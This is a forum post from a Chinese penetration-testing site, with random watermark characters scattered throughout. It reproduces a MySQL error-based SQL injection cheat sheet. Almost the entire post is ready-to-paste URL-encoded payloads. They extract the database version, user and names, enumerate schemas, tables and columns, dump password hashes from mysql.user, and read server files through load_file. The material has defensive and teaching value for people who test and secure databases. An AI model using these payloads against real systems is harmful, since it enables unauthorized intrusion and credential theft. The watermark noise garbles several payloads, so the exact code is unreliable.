中国网络渗透测试联盟

标题: Mysql暴错注入参考(pdf) [打印本页]
作者: admin    时间: 2013-7-27 11:00
标题: Mysql暴错注入参考(pdf)
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
  g1 P% }( p0 F! ~: P5 A
2 }' s8 [, w( X2 j) Y( {, k& J7 o' |7 J
4 w; B- o, f  q+ E4 q! }7 T) uMysql暴错注入参考(pdf),每天一贴。。。; y. S0 ?1 U& s% Q* K/ h( }

& y& J+ Z; m8 [5 z+ M4 J2 \! nMySql Error Based Injection Reference
* f4 ^0 e7 D& e8 x' \[Mysql暴错注入参考]. @4 m4 `- \" D( ]( w6 C0 _
Authornig0s19925 E4 m1 S  q# q4 o
Blog:http://pnig0s1992.blog.51cto.com/
/ H  W6 P/ m* T8 p! V/ y" pTeAm:http://www.FreeBuf.com/
5 ^$ Z8 v6 Y; X7 ?- F' iMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功* l" e- i; e, H, H, V' F9 _
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
/ ?1 J( l6 U8 y: {( e' l查询版本:
4 j9 a0 s1 K5 J5 l$ QMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+" Q* q$ u+ X+ h: Y
join+(select+name_const(@@version,0))b)c)/ K6 K. _7 S2 @. }) Y$ p2 A( `( J
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
9 m  M2 e6 q! W+ }& q6 J/ n  ?up by a)b)6 g  Y, B! p+ y3 b
查询当前用户:
- N) [( O& |! S' n  n8 s# ?Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)5 w* f6 K2 }. P, W1 l  c# u
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r1 f3 {! s' W  I, N, E6 o3 |$ w4 [
and(0)*2))x+from+information_schema.tables+group+by+x)a)
/ Y. Z  y3 N) _# Z查询当前数据库:
, v' J2 s! g0 o) r$ q& rMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)5 U5 e9 K: z, T4 k8 Y
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
- p' w, t+ Y- ?+ por(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
: Y5 m# G# G1 z1 N1 M4 U依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+; U; I6 R7 I: ?; l6 Q7 |
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n7 c1 n% z$ J8 I8 F( i# V; P( v
顺序替换
7 v- }; H6 d0 N0 [, G/ ~! P爆指定库数目:
2 j. D: i% z( j, n  n6 ^and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
8 D$ Y2 G9 ^& rable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group# q% ~% e! u6 z/ C5 D) Z
+by+x)a)+and+1=1 0x6D7973716C=mysql
) ~! ]; y* ]6 \0 A$ ]+ W依次爆表:
6 M$ W( Y4 O: x: D8 `+ ]1 p, rand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
+ E3 B% d6 g# }6 M; w1 H; i- oable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
/ Z$ F7 V, S( P- f7 a: v/ s; S$ ubles+group+by+x)a)+and+1=1. u# l, ~1 A, T1 X2 _
0x6D7973716C=Mysql 将n顺序替换
% _) y8 Y5 n0 O8 d" G爆表内字段数目:
+ C! u; @: g# w3 u" Mand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE& t( j3 p, S$ K3 y3 l/ L
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
/ T2 x+ x6 E! p; k0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
' Q& K, d, I$ r0 R& T3 l依次爆字段:! @' `/ f# o$ g4 g. C
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where" [+ z4 J" Q1 H# v, Y
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
& ^$ m. w  ?- y/ v  ]2 r# u9 vloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换# T& u* p5 t8 c# J
依次暴内容:
+ A& H# b" a$ P9 `1 y$ J4 Rand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
) Z. D2 n- z. }7 i2 Qma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1: a7 g% |. {/ }
将n顺序替换7 a' \1 T  `% Q* B
爆文件内容:
; T' b( H* J( W2 F0 Tand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
5 T& y8 X) a9 pfrom+information_schema.tables+group+by+a)b)
6 q9 ~: j" o5 B; f" K1 N; Q0 a0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
( X5 F7 B/ j0 l9 k3 F' h  n9 l- e; iThx for reading.
+ n& a0 P3 I+ Z3 f: [% F
! u  R& c5 y: a/ }7 K不要下载也可以, 2 {) Q' U. t+ F& c- F0 Q




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2